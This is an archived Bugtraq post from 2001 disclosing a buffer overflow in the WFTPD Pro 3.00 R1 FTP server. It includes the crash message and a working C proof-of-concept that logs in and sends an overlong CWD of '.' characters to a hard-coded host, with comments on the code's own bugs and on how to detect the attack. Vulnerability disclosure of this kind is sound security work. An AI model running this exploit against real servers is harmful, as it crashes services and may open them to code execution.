
 

Bugtraq mailing list archives

WFTPD Pro 3.00 R1 Buffer Overflow


From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:51:52 -0000

When the CWD command is sent followed by a long argument (~500 '.' characters),
the server crashes with:


Anwendungspopup: WFTPD Service Control: 
WFTPD.EXE - Fehler in Anwendung: 
Die Anweisung in "0x2e2e2e2e" verweist auf 
Speicher 
in "0x2e2e2e2e". Der Vorgang
"read" konnte nicht auf dem Speicher durchgeführt 
werden.

which means in English: the instruction at 0x2e2e2e2e referenced memory at
0x2e2e2e2e; the memory could not be read...


Executing arbitrary code is possible


The author has been contacted

----------------------
se00020 () fhs-hagenberg ac at or
se00020 () lion cc

Tested on win2k using the trial version of WFTPD 3.00 R1


Simple exploit:

//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by se00020 () fhs-hagenberg ac at

#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>

void main(){
        /* Proof-of-concept from the advisory above: connect to a hard-coded
         * host on FTP port 21, run a USER/PASS exchange, then send a CWD
         * whose argument is 796 bytes of '.'.
         *
         * Notes for the reader:
         *  - Non-standard signature; ISO C wants int main(void).
         *  - No Winsock call below has its return value checked.
         *  - From the server side, a CWD argument several hundred bytes long
         *    consisting of one repeated byte is trivially visible in FTP logs
         *    or to a length-based IDS check. */
        SOCKET sock_victim;
        WORD version=MAKEWORD(1,1);          /* request Winsock 1.1 */
        WSADATA wsadata;
        SOCKADDR_IN victim;
        int sockid;                          /* receives connect()'s status code, not a socket (see closesocket below) */
        char buffer[1024];                   /* the line that is sent; only partly written by sprintf */
        char exploitbuffer[800]={"CWD "};    /* "CWD " in bytes 0..3, remaining bytes zero-initialised */
        char recvbuffer[1024];



        WSAStartup(version, &wsadata);
        
        sock_victim=socket(AF_INET, 
SOCK_STREAM, IPPROTO_TCP);
        victim.sin_family=AF_INET;
        /* Target address is fixed in the source (the advisory's test host). */
        victim.sin_addr.s_addr=inet_addr
("10.17.3.44");
        victim.sin_port=htons(21);
        /* `(sockaddr*)` without `struct` is a C++ spelling; standard C needs
         * `(struct sockaddr *)`.  connect() returns 0 or SOCKET_ERROR, and
         * that status is what ends up in sockid. */
        sockid=connect(sock_victim, (sockaddr*) 
&victim, sizeof(victim));
        
    
        /* Banner, then USER/PASS.  '/0' is a two-character constant (slash,
         * zero), not the NUL escape '\0'; its int value is
         * implementation-defined and memset stores it converted to unsigned
         * char, so recvbuffer is most likely filled with '0' rather than
         * cleared.  Harmless here since recvbuffer is never read back. */
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        send(sock_victim, "USER test\r\n",strlen
("USER test\r\n"),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        send(sock_victim, "PASS\r\n",strlen
("PASS\r\n"),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);
        memset(recvbuffer, '/0',sizeof(recvbuffer));
        

        /* Fill bytes 4..799 with '.' (0x2e).  That leaves no NUL anywhere in
         * exploitbuffer, so the "%s" below reads past the end of the array
         * (undefined behaviour) until it happens to meet a zero byte on the
         * stack.  The fault address 0x2e2e2e2e quoted in the advisory is four
         * '.' bytes, which is consistent with this fill reaching a saved
         * control value inside the server. */
        memset(exploitbuffer+4,'.',sizeof
(exploitbuffer)-4);
        sprintf(buffer,"%s\r\n",exploitbuffer);
        
        /* sizeof(buffer) sends all 1024 bytes: the CWD line plus whatever
         * follows it in buffer, which sprintf never wrote. */
        send(sock_victim, buffer , sizeof(buffer),0);
        recv(sock_victim, recvbuffer, sizeof
(recvbuffer),0);

        /* sockid holds connect()'s return code, not a socket handle, so this
         * first call does not close anything useful. */
        closesocket(sockid);
        closesocket(sock_victim);

}

